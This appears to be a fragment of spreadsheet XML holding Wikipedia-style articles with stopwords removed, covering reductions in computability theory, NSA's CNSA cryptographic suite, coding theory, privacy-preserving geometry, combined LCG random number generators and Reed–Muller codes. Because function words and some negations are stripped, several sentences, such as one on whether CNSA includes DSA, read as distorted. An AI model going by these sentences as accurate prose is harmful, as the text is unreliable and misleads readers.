empty, particular halt input reject. rejects language accepted nonempty, halt input accept. thus, decider would able produce decider halting problem h(m, machine input since know cannot exist, follows language also undecidable. also gadget (computer science) many-one reduction parsimonious reduction reduction (recursion theory) truth table reduction turing reduction references thomas cormen, charles leiserson, ronald rivest clifford stein, introduction algorithms, press, 2001, isbn 978-0-262-03293-3 hartley rogers, jr.: theory recursive functions effective computability, mcgraw-hill, 1967, isbn 978-0-262-68052-3. peter bürgisser: completeness reduction algebraic complexity theory, springer, 2000, isbn 978-3-540-66752-0. e.r. griffor: handbook computability theory, north holland, 1999, isbn 978-0-444-89882-1.</t>
  </si>
  <si>
    <t>Commercial National Security Algorithm Suite</t>
  </si>
  <si>
    <t>commercial national security algorithm suite (cnsa) cryptographic algorithms promulgated national security agency replacement suite cryptography algorithms. serves cryptographic base protect national security systems information secret level, plans transition quantum-resistant cryptography.the suite includes advanced encryption standard keys elliptic-curve diffie–hellman elliptic curve digital signature algorithm curve p-384 sha-2 bits, diffie–hellman exchange minimum 3072-bit modulus, minimum modulus size 3072.the cnsa transition notable moving temporary legacy status, appeared suite supported status. also include digital signature algorithm. this, overall delivery timing announcement, absence post-quantum standards, raised considerable speculation whether found weaknesses e.g. elliptic-curve algorithms others, trying distance exclusive focus non-technical reasons. references</t>
  </si>
  <si>
    <t>Coding theory</t>
  </si>
  <si>
    <t>coding theory study properties codes respective fitness specific applications. codes used data compression, cryptography, error detection correction, data transmission data storage. codes studied various scientific disciplines—such information theory, electrical engineering, mathematics, linguistics, computer science—for purpose designing efficient reliable data transmission methods. this typically involves removal redundancy correction detection errors transmitted data. there four types coding: data compression source coding) error control channel coding) cryptographic coding line codingdata compression attempts remove unwanted redundancy data source order transmit efficiently. example, data compression makes data files smaller, purposes reduce internet traffic. data compression error correction studied combination. error correction adds useful redundancy data source make transmission robust disturbances present transmission channel. ordinary user aware many applications using error correction. typical music compact disc (cd) uses reed–solomon code correct scratches dust. application transmission channel itself. cell phones also coding techniques correct fading noise high frequency radio transmission. data modems, telephone transmissions, nasa deep space network employ channel coding techniques bits through, example turbo code ldpc codes. history coding theory 1948, claude shannon published mathematical theory communication", article parts july october issues bell system technical journal. this work focuses problem best encode information sender wants transmit. fundamental work used tools probability theory, developed norbert wiener, nascent stages applied communication theory time. shannon developed information entropy measure uncertainty message essentially inventing field information theory. binary golay code developed 1949. error-correcting code capable correcting three errors 24-bit word, detecting fourth. richard hamming turing award 1968 work bell labs numerical methods, automatic coding systems, error-detecting error-correcting codes. invented concepts known hamming codes, hamming windows, hamming numbers, hamming distance. 1972, nasir ahmed proposed discrete cosine transform (dct), developed natarajan 1973. widely used lossy compression algorithm, basis multimedia formats jpeg, mpeg mp3. source coding source coding take source data make smaller. definition data seen random variable {\displaystyle x:\omega {\mathcal {x}}} {\displaystyle x\in {\mathcal {x}}} appears probability {\displaystyle \mathbb [x=x]} data encoded strings (words) alphabet {\displaystyle \sigma code function {\displaystyle c:{\mathcal {x}}\to \sigma ^{*}} {\displaystyle \sigma ^{+}} empty string part alphabet). {\displaystyle c(x)} code word associated {\displaystyle length code word written {\displaystyle l(c(x)).} expected length code {\displaystyle l(c)=\sum _{x\in {\mathcal {x}}}l(c(x))\mathbb [x=x].} concatenation code words {\displaystyle c(x_{1},\ldots ,x_{k})=c(x_{1})c(x_{2})\cdots c(x_{k})} code word empty string empty string itself: {\displaystyle c(\epsilon )=\epsilon properties {\displaystyle c:{\mathcal {x}}\to \sigma ^{*}} non-singular injective. {\displaystyle c:{\mathcal {x}}^{*}\to \sigma ^{*}} uniquely decodable injective. {\displaystyle c:{\mathcal {x}}\to \sigma ^{*}} instantaneous {\displaystyle c(x_{1})} prefix {\displaystyle c(x_{2})} (and vice versa). principle entropy source measure information. basically, source codes reduce redundancy present source, represent source fewer bits carry information. data compression explicitly tries minimize average length messages according particular assumed probability model called entropy encoding. various techniques used source coding schemes achieve limit entropy source. c(x) h(x), h(x) entropy source (bitrate), c(x) bitrate compression. particular, source coding scheme better entropy source. example facsimile transmission uses simple length code. source coding removes data superfluous need transmitter, decreasing bandwidth required transmission. channel coding purpose channel coding theory find codes transmit quickly, contain many valid code words correct least detect many errors. while mutually exclusive, performance areas trade off. different codes optimal different applications. needed properties code mainly depend probability errors happening transmission. typical impairment mainly dust scratches. cross-interleaved reed–solomon coding spread data disk.although good code, simple repeat code serve understandable example. suppose take block data bits (representing sound) send three times. receiver examine three repetitions take majority vote. twist merely send bits order. interleave them. block data bits first divided smaller blocks. then cycle block send first, second, etc. this done three times spread data surface disk. context simple repeat code, appear effective. however, powerful codes known effective correcting "burst" error scratch dust spot interleaving technique used. other codes appropriate different applications. deep space communications limited thermal noise receiver continuous nature bursty nature. likewise, narrowband modems limited noise, present telephone network also modeled better continuous disturbance. cell phones subject rapid fading. high frequencies used cause rapid fading signal even receiver moved inches. again class channel codes designed combat fading. linear codes term algebraic coding theory denotes sub-field coding theory properties codes expressed algebraic terms researched.algebraic coding theory basically divided major types codes: linear block codes convolutional codesit analyzes following three properties code mainly: code word length total number valid code words minimum distance valid code words, using mainly hamming distance, sometimes also distances like distance linear block codes linear block codes property linearity, i.e. codewords also code word, applied source bits blocks, hence name linear block codes. there block codes linear, difficult prove code good without property.linear block codes summarized symbol alphabets (e.g., binary ternary) parameters (n,m,dmin) length codeword, symbols, number source symbols used encoding once, dmin minimum hamming distance code.there many types linear block codes, cyclic codes (e.g., hamming codes) repetition codes parity codes polynomial codes (e.g., codes) reed–solomon codes algebraic geometric codes reed–muller codes perfect codesblock codes tied sphere packing problem, received attention years. dimensions, easy visualize. take bunch pennies flat table push together. result hexagon pattern like bee's nest. block codes rely dimensions cannot easily visualized. powerful (24,12) golay code used deep space communications uses dimensions. used binary code (which usually dimensions refer length codeword defined above. theory coding uses n-dimensional sphere model. example, many pennies packed circle tabletop, dimensions, many marbles packed globe. other considerations enter choice code. example, hexagon packing constraint rectangular leave empty space corners. dimensions larger, percentage empty space grows smaller. certain dimensions, packing uses space codes so-called "perfect" codes. nontrivial useful perfect codes distance-3 hamming codes parameters satisfying [23,12,7] binary [11,6,5] ternary golay codes.another code property number neighbors single codeword have. again, consider pennies example. first pack pennies rectangular grid. each penny near neighbors (and corners farther away). hexagon, penny near neighbors. when increase dimensions, number near neighbors increases rapidly. result number ways noise make receiver choose neighbor (hence error) grows well. this fundamental limitation block codes, indeed codes. harder cause error single neighbor, number neighbors large enough total error probability actually suffers.properties linear block codes used many applications. example, syndrome-coset uniqueness property linear block codes used trellis shaping, best-known shaping codes. convolutional codes idea behind convolutional code make every codeword symbol weighted various input message symbols. this like convolution used systems find output system, know input impulse response. generally find output system convolutional encoder, convolution input bit, states convolution encoder, registers. fundamentally, convolutional codes offer protection noise equivalent block code. many cases, generally offer greater simplicity implementation block code equal power. encoder usually simple circuit state memory feedback logic, normally gates. decoder implemented software firmware. viterbi algorithm optimum algorithm used decode convolutional codes. there simplifications reduce computational load. they rely searching likely paths. although optimum, generally found give good results noise environments. convolutional codes used voiceband modems (v.32, v.17, v.34) mobile phones, well satellite military communication devices. cryptographic coding cryptography cryptographic coding practice study techniques secure communication presence third parties (called adversaries). more generally, constructing analyzing protocols block adversaries; various aspects information security data confidentiality, data integrity, authentication, non-repudiation central modern cryptography. modern cryptography exists intersection disciplines mathematics, computer science, electrical engineering. applications cryptography include cards, computer passwords, electronic commerce. cryptography prior modern effectively synonymous encryption, conversion information readable state apparent nonsense. originator encrypted message shared decoding technique needed recover original information intended recipients, thereby precluding unwanted persons same. since world advent computer, methods used carry cryptology become increasingly complex application widespread. modern cryptography heavily based mathematical theory computer science practice; cryptographic algorithms designed around computational hardness assumptions, making algorithms hard break practice adversary. theoretically possible break system, infeasible known practical means. these schemes therefore termed computationally secure; theoretical advances, e.g., improvements integer factorization algorithms, faster computing technology require solutions continually adapted. there exist information-theoretically secure schemes provably cannot broken even unlimited computing power—an example one-time pad—but schemes difficult implement best theoretically breakable computationally secure mechanisms. line coding line code (also called digital baseband modulation digital baseband transmission method) code chosen within communications system baseband transmission purposes. line coding often used digital data transport. line coding consists representing digital signal transported amplitude- time-discrete signal optimally tuned specific properties physical channel (and receiving equipment). waveform pattern voltage current used represent digital data transmission link called line encoding. common types line encoding unipolar, polar, bipolar, manchester encoding. other applications coding theory another concern coding theory designing codes help synchronization. code designed phase shift easily detected corrected multiple signals sent channel.another application codes, used mobile phone systems, code-division multiple access (cdma). each phone assigned code sequence approximately uncorrelated codes phones. when transmitting, code word used modulate data bits representing voice message. receiver, demodulation process performed recover data. properties class codes allow many users (with different codes) radio channel time. receiver, signals users appear demodulator low-level noise.another general class codes automatic repeat-request (arq) codes. codes sender adds redundancy message error checking, usually adding check bits. check bits consistent rest message arrives, receiver sender retransmit message. simplest wide area network protocols arq. common protocols include sdlc (ibm), (internet), x.25 (international) many others. there extensive field research topic problem matching rejected packet packet. retransmission? typically numbering schemes used, tcp."rfc793". rfcs. internet engineering task force (ietf). september 1981. group testing group testing uses codes different way. consider large group items different particular (e.g., defective products infected test subjects). idea group testing determine items "different" using tests possible. origin problem roots second world united states army forces needed test soldiers syphilis. analog coding information encoded analogously neural networks brains, analog signal processing, analog electronics. aspects analog coding include analog error correction, analog data compression analog encryption. neural coding neural coding neuroscience-related field concerned sensory information represented brain networks neurons. main goal studying neural coding characterize relationship stimulus individual ensemble neuronal responses relationship among electrical activity neurons ensemble. thought neurons encode digital analog information, neurons follow principles information theory compress information, detect correct errors signals sent throughout brain wider nervous system. also coding gain covering code error correction code folded reed–solomon code group testing hamming distance, hamming weight distance list algebraic coding theory topics spatial coding mimo multiple antenna research spatial diversity coding spatial coding transmits replicas information signal along different spatial paths, increase reliability data transmission. spatial interference cancellation coding spatial multiplex coding timeline information theory, data compression, error correcting codes notes references elwyn berlekamp (2014), algebraic coding theory, world scientific publishing (revised edition), isbn 978-9-81463-589-9. mackay, david information theory, inference, learning algorithms cambridge: cambridge university press, 2003. isbn 0-521-64298-1 vera pless (1982), introduction theory error-correcting codes, john wiley sons, inc., isbn 0-471-08684-3. randy yates, coding theory tutorial.</t>
  </si>
  <si>
    <t>Privacy-preserving computational geometry</t>
  </si>
  <si>
    <t>privacy-preserving computational geometry research area intersection domains secure multi-party computation (smc) computational geometry. classical problems computational geometry reconsidered point view include shape intersection, private point inclusion problem, range searching, convex hull, more.a pioneering work area 2001 paper atallah secure point polygon inclusion polygonal intersection problems considered. other problems computation distance private points secure two-party point-circle inclusion problem. problem statements problems conventional "alice bob" terminology. problems required solution protocol information exchange additional information revealed beyond inferred answer required question. point-in-polygon: alice point polygon they need determine whether inside polygon pair intersection: alice polygon polygon they need determine whether intersects references</t>
  </si>
  <si>
    <t>Reduction (recursion theory)</t>
  </si>
  <si>
    <t>computability theory, many reducibility relations (also called reductions, reducibilities, notions reducibility) studied. they motivated question: given sets {\displaystyle {\displaystyle natural numbers, possible effectively convert method deciding membership {\displaystyle method deciding membership {\displaystyle answer question affirmative {\displaystyle said reducible {\displaystyle study reducibility notions motivated study decision problems. many notions reducibility, noncomputable reducible {\displaystyle {\displaystyle must also noncomputable. this gives powerful technique proving many sets noncomputable. reducibility relations reducibility relation binary relation sets natural numbers reflexive: every reducible itself. transitive: {\displaystyle reducible {\displaystyle {\displaystyle reducible {\displaystyle {\displaystyle reducible {\displaystyle .these properties imply reducibility preorder powerset natural numbers. preorders studied reducibility notions, however. notions studied computability theory informal property {\displaystyle reducible {\displaystyle (possibly noneffective) decision procedure {\displaystyle effectively converted decision procedure {\displaystyle different reducibility relations vary methods permit conversion process use. degrees reducibility relation every reducibility relation fact, every preorder) induces equivalence relation powerset natural numbers sets equivalent reducible other. computability theory, equivalence classes called degrees reducibility relation. example, turing degrees equivalence classes sets naturals induced turing reducibility. degrees reducibility relation partially ordered relation following manner. {\displaystyle \leq reducibility relation {\displaystyle {\displaystyle degrees. then {\displaystyle c\leq {\displaystyle {\displaystyle {\displaystyle {\displaystyle {\displaystyle a\leq this equivalent property every {\displaystyle {\displaystyle every {\displaystyle {\displaystyle {\displaystyle a\leq sets equivalent sets {\displaystyle equivalent. common, shown here, boldface notation denote degrees. turing reducibility fundamental reducibility notion turing reducibility. {\displaystyle natural numbers turing reducible {\displaystyle oracle turing machine that, {\displaystyle oracle set, compute indicator function (characteristic function) {\displaystyle equivalently, {\displaystyle turing reducible {\displaystyle algorithm computing indicator function {\displaystyle provided algorithm provided means correctly answer questions form {\displaystyle {\displaystyle turing reducibility serves dividing line reducibility notions because, according church-turing thesis, general reducibility relation effective. reducibility relations imply turing reducibility come known strong reducibilities, implied turing reducibility weak reducibilities. equivalently, strong reducibility relation whose degrees form finer equivalence relation turing degrees, weak reducibility relation whose degrees form coarser equivalence relation turing equivalence. reductions stronger turing reducibility strong reducibilities include one-one reducibility: {\displaystyle one-one reducible {\displaystyle computable one-to-one function {\displaystyle {\displaystyle a(x)=b(f(x))} {\displaystyle many-one reducibility: {\displaystyle many-one reducible {\displaystyle computable function {\displaystyle {\displaystyle a(x)=b(f(x))} {\displaystyle truth-table reducible: {\displaystyle truth-table reducible {\displaystyle {\displaystyle turing reducible {\displaystyle single (oracle) turing machine produces total function relative every oracle. weak truth-table reducible: {\displaystyle weak truth-table reducible {\displaystyle turing reduction {\displaystyle {\displaystyle computable function {\displaystyle bounds use. whenever {\displaystyle truth-table reducible {\displaystyle {\displaystyle also weak truth-table reducible {\displaystyle since construct computable bound considering maximum tree oracles, exist reduction total oracles. positive reducible: {\displaystyle positive reducible {\displaystyle {\displaystyle truth-table reducible {\displaystyle compute every {\displaystyle formula consisting atoms form {\displaystyle b(0),b(1),...} atoms combined and's or's, {\displaystyle {\displaystyle {\displaystyle a=1} {\displaystyle b=1} enumeration reducibility: similar positive reducibility, relating effective procedure enumerability {\displaystyle {\displaystyle disjunctive reducible: similar positive reducible additional constraint or's permitted. conjunctive reducibility: similar positive reducibility additional constraint and's permitted. linear reducibility: similar positive reducibility constraint atoms form {\displaystyle b(n)} combined exclusive or's. words, {\displaystyle linear reducible {\displaystyle computable function computes {\displaystyle finite {\displaystyle f(x)} given explicit list numbers {\displaystyle x\in {\displaystyle f(x)} contains number elements {\displaystyle .many introduced post (1944). post searching non-computable, computably enumerable halting problem could turing reduced could construct 1944, instead worked analogous problems various reducibilities introduced. these reducibilities since subject much research, many relationships known. bounded reducibilities bounded form strong reducibilities defined. famous bounded truth-table reduction, also bounded turing, bounded weak truth-table, others. these first three common ones based number queries. example, {\displaystyle bounded truth-table reducible {\displaystyle turing machine {\displaystyle computing {\displaystyle relative {\displaystyle computes list {\displaystyle numbers, queries {\displaystyle numbers terminates possible oracle answers; value {\displaystyle constant independent {\displaystyle difference bounded weak truth-table bounded turing reduction first case, {\displaystyle queries made time second case, queries made other. reason, cases {\displaystyle bounded turing reducible {\displaystyle weak truth-table reducible {\displaystyle strong reductions computational complexity strong reductions listed restrict manner oracle information accessed decision procedure otherwise limit computational resources available. thus {\displaystyle decidable {\displaystyle reducible {\displaystyle strong reducibility relations listed above, even {\displaystyle polynomial-time exponential-time decidable. this acceptable study computability theory, interested theoretical computability, reasonable computational complexity theory, studies sets decided certain asymptotical resource bounds. common reducibility computational complexity theory polynomial-time reducibility; polynomial-time reducible {\displaystyle polynomial-time function every {\displaystyle {\displaystyle {\displaystyle {\displaystyle f(n)} {\displaystyle this reducibility essentially, resource-bounded version many-one reducibility. other resource-bounded reducibilities used contexts computational complexity theory resource bounds interest. reductions weaker turing reducibility although turing reducibility general reducibility effective, weaker reducibility relations commonly studied. these reducibilities related relative definability sets arithmetic theory. they include: arithmetical reducibility: {\displaystyle arithmetical {\displaystyle {\displaystyle definable standard model peano arithmetic extra predicate {\displaystyle equivalently, according post's theorem, arithmetical {\displaystyle {\displaystyle turing reducible {\displaystyle b^{(n)}} {\displaystyle turing jump {\displaystyle natural number {\displaystyle arithmetical hierarchy gives finer classification arithmetical reducibility. hyperarithmetical reducibility: {\displaystyle hyperarithmetical {\displaystyle {\displaystyle {\displaystyle \delta _{1}^{1}} definable (see analytical hierarchy) standard model peano arithmetic predicate {\displaystyle equivalently, {\displaystyle hyperarithmetical {\displaystyle {\displaystyle turing reducible {\displaystyle b^{(\alpha {\displaystyle turing jump {\displaystyle {\displaystyle -recursive ordinal {\displaystyle relative constructibility: {\displaystyle relatively constructible {\displaystyle {\displaystyle {\displaystyle l(b)} smallest transitive model theory containing {\displaystyle ordinals. references ambos-spies fejer, 2006. "degrees unsolvability." unpublished preprint. odifreddi, 1989. classical recursion theory, north-holland. isbn 0-444-87295-7 odifreddi, 1999. classical recursion theory, volume elsevier. isbn 0-444-50205-x post, 1944, "recursively enumerable sets positive integers decision problems", bulletin american mathematical society, volume pages 284–316. rogers, jr., 1967. theory recursive functions effective computability, second edition 1987, press. isbn 0-262-68052-1 (paperback), isbn 0-07-053522-1 sacks, 1990. higher recursion theory, springer-verlag. isbn 3-540-19305-7 internet resources stanford encyclopedia philosophy: recursive functions</t>
  </si>
  <si>
    <t>Combined linear congruential generator</t>
  </si>
  <si>
    <t>combined linear congruential generator (clcg) pseudo-random number generator algorithm based combining linear congruential generators (lcg). traditional period inadequate complex system simulation. combining lcgs, random numbers longer period better statistical properties created. algorithm defined {\displaystyle x_{i}\equiv \left(\sum _{j=1}^{k}(-1)^{j-1}y_{i,j}\right){\pmod {m_{1}-1}}} where: {\displaystyle m_{1}} "modulus" first {\displaystyle y_{i,j}} input {\displaystyle x_{i}} generated random integerwith: {\displaystyle r_{i}\equiv {\begin{cases}x_{i}/m_{1}&amp;{\text{for }}x_{i}&gt;0\\(m_{1}-1)/m_{1}&amp;{\text{for }}x_{i}=0\end{cases}}} {\displaystyle r_{i}} uniformly distributed random number derivation wi,1, wi,2, ..., wi,k independent, discrete, random-variables uniformly distributed uniformly distributed where: {\displaystyle z_{i}=\left(\sum _{j=1}^{k}w_{i,j}\right){\pmod {m_{1}-1}}} xi,1, xi,2, ..., xi,k outputs lcgs. wi,j defined xi,j wi,j approximately uniformly distributed coefficient "(−1)j−1" implicitly performs subtraction xi,j. properties clcg provides efficient calculate pseudo-random numbers. algorithm computationally inexpensive use. results multiple algorithms combined clcg algorithm create pseudo-random numbers longer period achievable method itself.the period clcg least common multiple periods individual generators, less moduli. since moduli primes, periods even thus share least common divisor moduli chosen greatest common divisor pair, result period {\displaystyle p={\frac {(m_{1}-1)(m_{2}-1)\cdots (m_{k}-1)}{2^{k-1}}}} example following example algorithm designed 32-bit computers: {\displaystyle k=2} lcgs used following properties: 40014 40692 2147483563 2147483399 {\displaystyle {\begin{aligned}a_{1}&amp;=40014&amp;a_{2}&amp;=40692\\m_{1}&amp;=2147483563&amp;m_{2}&amp;=2147483399\\c_{1}&amp;=0&amp;c_{2}&amp;=0\end{aligned}}} clcg algorithm follows: seed first lcg, {\displaystyle y_{0,1}} selected range 2147483562]. seed second lcg, {\displaystyle y_{0,2}} selected range 2147483398]. set: {\displaystyle i=0} lcgs evaluated follows: 40014 2147483563 {\displaystyle y_{i+1,1}=40014\times y_{i,1}{\pmod {2147483563}}} 40692 2147483399 {\displaystyle y_{i+1,2}=40692\times y_{i,2}{\pmod {2147483399}}} clcg equation solved shown below: 2147483563 {\displaystyle x_{i+1}=(y_{i+1,1}-y_{i+1,2}){\pmod {2147483563}}} calculate random number: 2147483563 2147483563 2147483562 2147483563 {\displaystyle r_{i+1}={\begin{cases}x_{i+1}/2147483563&amp;{\text{for }}x_{i+1}&gt;0\\(x_{i+1}/2147483563)+1&amp;{\text{for }}x_{i+1}&lt;0\\2147483562/2147483563&amp;{\text{for }}x_{i+1}=0\end{cases}}} increment counter return step repeat. maximum period lcgs used calculated using formula:. {\displaystyle (m-1)} this equates 2.1×109 lcgs used. this clcg shown example maximum period {\displaystyle (m_{1}-1)(m_{2}-1)/2\approx 2.3\times 10^{18}} this represents tremendous improvement period individual lcgs. seen combined method increases period orders magnitude. surprisingly period clcg sufficient applications. other algorithms using clcg method used create pseudo-random number generators periods long 3×1057. also linear congruential generator wichmann–hill, specific combined proposed 1982 references external links overview testing pseudo-random number generators</t>
  </si>
  <si>
    <t>Reed–Muller code</t>
  </si>
  <si>
    <t>reed–muller codes error-correcting codes used wireless communications applications, particularly deep-space communication. moreover, proposed standard relies closely related polar codes error correction control channel. favorable theoretical mathematical properties, reed–muller codes also extensively studied theoretical computer science. reed–muller codes generalize reed–solomon codes walsh–hadamard code. reed–muller codes linear block codes locally testable, locally decodable, list decodable. these properties make particularly useful design probabilistically checkable proofs. traditional reed–muller codes binary codes, means messages codewords binary strings. when integers reed–muller code parameters denoted rm(r, when asked encode message consisting bits, {\displaystyle \textstyle k=\sum _{i=0}^{r}{\binom {m}{i}}} holds, rm(r, code produces codeword consisting bits. reed–muller codes named david muller, discovered codes 1954, irving reed, proposed first efficient decoding algorithm. description using low-degree polynomials reed–muller codes described several different (but ultimately equivalent) ways. description based low-degree polynomials quite elegant particularly suited application locally testable codes locally decodable codes. encoder block code encoding functions {\textstyle c:\{0,1\}^{k}\to \{0,1\}^{n}} messages {\textstyle x\in \{0,1\}^{k}} codewords {\textstyle c(x)\in \{0,1\}^{n}} reed–muller code rm(r, message length {\displaystyle \textstyle k=\sum _{i=0}^{r}{\binom {m}{i}}} block length {\displaystyle \textstyle n=2^{m}} define encoding code based evaluation multilinear polynomials variables total degree every multilinear polynomial finite field elements written follows: {\textstyle z_{1},\dots ,z_{m}} variables polynomial, values {\textstyle c_{s}\in \{0,1\}} coefficients polynomial. since exactly {\textstyle coefficients, message {\textstyle x\in \{0,1\}^{k}} consists {\textstyle values used coefficients. way, message {\textstyle gives rise unique polynomial {\textstyle p_{x}} variables. construct codeword {\textstyle c(x)} encoder evaluates {\textstyle p_{x}} evaluation points {\textstyle a\in \{0,1\}^{m}} interprets addition modulo order obtain {\textstyle (p_{x}(a){\bmod {2}})\in \{0,1\}} that encoding function defined fact codeword {\displaystyle c(x)} suffices uniquely reconstruct {\displaystyle follows lagrange interpolation, states coefficients polynomial uniquely determined sufficiently many evaluation points given. since {\displaystyle c(0)=0} {\displaystyle c(x+y)=c(x)+c(y){\bmod {2}}} holds messages {\displaystyle x,y\in \{0,1\}^{k}} function {\displaystyle linear map. thus reed–muller code linear code. example code rm(2, parameters follows: {\textstyle {\begin{aligned}r&amp;=2\\m&amp;=4\\k&amp;=\textstyle {\binom {4}{2}}+{\binom {4}{1}}+{\binom {4}{0}}=6+4+1=11\\n&amp;=2^{m}=16\\\end{aligned}}} {\textstyle c:\{0,1\}^{11}\to \{0,1\}^{16}} encoding function defined. encode string 1010 010101 length encoder first constructs polynomial {\textstyle p_{x}} variables:then evaluates polynomial evaluation points:as result, 1010 010101) 1111 1010 0101 0000 holds. decoder already mentioned, lagrange interpolation used efficiently retrieve message codeword. however, decoder needs work even codeword corrupted positions, received word different codeword. case, local decoding procedure help. generalization larger alphabets low-degree polynomials using low-degree polynomials finite field {\displaystyle \mathbb size {\displaystyle possible extend definition reed–muller codes alphabets size {\displaystyle {\displaystyle {\displaystyle positive integers, {\displaystyle thought larger {\displaystyle encode message {\textstyle x\in \mathbb ^{k}} width {\displaystyle k=\textstyle {\binom {m+d}{m}}} message interpreted {\displaystyle -variate polynomial {\displaystyle p_{x}} total degree {\displaystyle coefficient {\displaystyle \mathbb such polynomial indeed {\displaystyle \textstyle {\binom {m+d}{m}}} coefficients. reed–muller encoding {\displaystyle list evaluations {\displaystyle p_{x}(a)} {\displaystyle a\in \mathbb ^{m}} thus block length {\displaystyle n=q^{m}} description using generator matrix generator matrix reed–muller code rm(r, length constructed follows. write m-dimensional binary vectors {\displaystyle x=\mathbb _{2}^{m}=\{x_{1},\ldots ,x_{n}\}.} define n-dimensional space {\displaystyle \mathbb _{2}^{n}} indicator vectors {\displaystyle \mathbb _{a}\in \mathbb _{2}^{n}} subsets {\displaystyle a\subset otherwise {\displaystyle \left(\mathbb _{a}\right)_{i}={\begin{cases}1&amp;{\mbox{ }}x_{i}\in a\\0&amp;{\mbox{ otherwise}}\\\end{cases}}} together with, also {\displaystyle \mathbb _{2}^{n}} binary operation {\displaystyle w\wedge z=(w_{1}\cdot z_{1},\ldots ,w_{n}\cdot z_{n}),} referred wedge product (not confused wedge product defined exterior algebra). here, {\displaystyle w=(w_{1},w_{2},\ldots ,w_{n})} {\displaystyle z=(z_{1},z_{2},\ldots ,z_{n})} points {\displaystyle \mathbb _{2}^{n}} (n-dimensional binary vectors), operation {\displaystyle \cdot usual multiplication field {\displaystyle \mathbb _{2}} {\displaystyle \mathbb _{2}^{m}} m-dimensional vector space field {\displaystyle \mathbb _{2}} possible write {\displaystyle (\mathbb _{2})^{m}=\{(y_{m},\ldots ,y_{1})\mid y_{i}\in \mathbb _{2}\}.} define n-dimensional space {\displaystyle \mathbb _{2}^{n}} following vectors length {\displaystyle n:v_{0}=(1,1,\ldots ,1)} {\displaystyle v_{i}=\mathbb _{h_{i}},} hyperplanes {\displaystyle (\mathbb _{2})^{m}} (with dimension {\displaystyle h_{i}=\{y\in (\mathbb _{2})^{m}\mid y_{i}=0\}.} generator matrix reed–muller rm(r, code order length code generated wedge products (where convention wedge product fewer vector identity operation). words, build generator matrix rm(r, code, using vectors wedge product permutations time {\displaystyle {v_{0},v_{1},\ldots ,v_{n},\ldots ,(v_{i_{1}}\wedge v_{i_{2}}),\ldots (v_{i_{1}}\wedge v_{i_{2}}\ldots \wedge v_{i_{r}})}} rows generator matrix, example then {\displaystyle x=\mathbb _{2}^{3}=\{(0,0,0),(0,0,1),(0,1,0)\ldots ,(1,1,1)\},} {\displaystyle {\begin{aligned}v_{0}&amp;=(1,1,1,1,1,1,1,1)\\[2pt]v_{1}&amp;=(1,0,1,0,1,0,1,0)\\[2pt]v_{2}&amp;=(1,1,0,0,1,1,0,0)\\[2pt]v_{3}&amp;=(1,1,1,1,0,0,0,0).\end{aligned}}} rm(1,3) code generated {\displaystyle \{v_{0},v_{1},v_{2},v_{3}\},\,} explicitly rows matrix: {\displaystyle {\begin{pmatrix}1&amp;1&amp;1&amp;1&amp;1&amp;1&amp;1&amp;1\\1&amp;0&amp;1&amp;0&amp;1&amp;0&amp;1&amp;0\\1&amp;1&amp;0&amp;0&amp;1&amp;1&amp;0&amp;0\\1&amp;1&amp;1&amp;1&amp;0&amp;0&amp;0&amp;0\end{pmatrix}}} example rm(2,3) code generated set: {\displaystyle \{v_{0},v_{1},v_{2},v_{3},v_{1}\wedge v_{2},v_{1}\wedge v_{3},v_{2}\wedge v_{3}\}} explicitly rows matrix: {\displaystyle {\begin{pmatrix}1&amp;1&amp;1&amp;1&amp;1&amp;1&amp;1&amp;1\\1&amp;0&amp;1&amp;0&amp;1&amp;0&amp;1&amp;0\\1&amp;1&amp;0&amp;0&amp;1&amp;1&amp;0&amp;0\\1&amp;1&amp;1&amp;1&amp;0&amp;0&amp;0&amp;0\\1&amp;0&amp;0&amp;0&amp;1&amp;0&amp;0&amp;0\\1&amp;0&amp;1&amp;0&amp;0&amp;0&amp;0&amp;0\\1&amp;1&amp;0&amp;0&amp;0&amp;0&amp;0&amp;0\\\end{pmatrix}}} properties following properties hold: possible wedge products form basis {\displaystyle \mathbb _{2}^{n}} code rank {\displaystyle \sum _{s=0}^{r}{m \choose s}.} denotes product codes. minimum hamming weight proof decoding codes rm(r, codes decoded using majority logic decoding. basic idea majority logic decoding build several checksums received code word element. since different checksums must value (i.e. value message word element weight), majority logic decoding decipher value message word element. once order polynomial decoded, received word modified accordingly removing corresponding codewords weighted decoded message contributions, present stage. order code, decode iteratively r+1, times arrive final received code-word. also, values message bits calculated scheme; finally calculate codeword multiplying message word (just decoded) generator matrix. clue decoding succeeded, all-zero modified received word, 1)-stage decoding majority logic decoding. this technique proposed irving reed, general applied finite geometry codes. description using recursive construction reed–muller code rm(r,m) exists integers {\displaystyle m\geq {\displaystyle 0\leq r\leq rm(m, defined universe {\displaystyle 2^{m},2^{m},1} code. rm(−1,m) defined trivial code {\displaystyle 2^{m},0,\infty remaining codes constructed elementary codes using length-doubling construction {\displaystyle \mathrm {rm} (r,m)=\{(\mathbf ,\mathbf +\mathbf )\mid \mathbf \mathrm {rm} (r,m-1),\mathbf \mathrm {rm} (r-1,m-1)\}.} from construction, rm(r,m) binary linear block code length dimension {\displaystyle k(r,m)=k(r,m-1)+k(r-1,m-1)} minimum distance {\displaystyle d=2^{m-r}} {\displaystyle r\geq dual code rm(r,m) rm(m-r-1,m). this shows repetition codes duals, biorthogonal extended hamming codes duals codes self-dual. special cases reed–muller codes table rm(r,m) codes rm(r, codes {\displaystyle m\leq alphabet size displayed here, annotated standard [n,k,d] coding theory notation block codes. code rm(r, {\displaystyle \textstyle [2^{m},k,2^{m-r}]_{2}} -code, linear code binary alphabet, block length {\displaystyle \textstyle 2^{m}} message length dimension) minimum distance {\displaystyle \textstyle 2^{m-r}} properties rm(r,m) codes r≥m-1 rm(0, codes repetition codes length rate {\displaystyle {r={\tfrac {1}{n}}}} minimum distance {\displaystyle d_{\min }=n} rm(1, codes parity check codes length rate {\displaystyle r={\tfrac {m+1}{n}}} minimum distance {\displaystyle d_{\min }={\tfrac {n}{2}}} rm(m codes single parity check codes length rate {\displaystyle r={\tfrac {n-1}{n}}} minimum distance {\displaystyle d_{\min }=2} rm(m codes family extended hamming codes length minimum distance {\displaystyle d_{\min }=4} references further reading lin; daniel costello (2005). error control coding ed.). pearson. isbn 978-0-13-017973-9. chapter j.h. lint (1992). introduction coding theory. gtm. vol. ed.). springer-verlag. isbn 978-3-540-54894-2. chapter 4.5. external links opencourseware, 6.451 principles digital communication lecture notes section matlab-implementation rm-codes source matlab-implementation rm-codes weiss, (september 1962). "generalized reed-muller codes". information control. (3): 213–222. doi:10.1016/s0019-9958(62)90555-7. issn 0019-9958.</t>
  </si>
  <si>
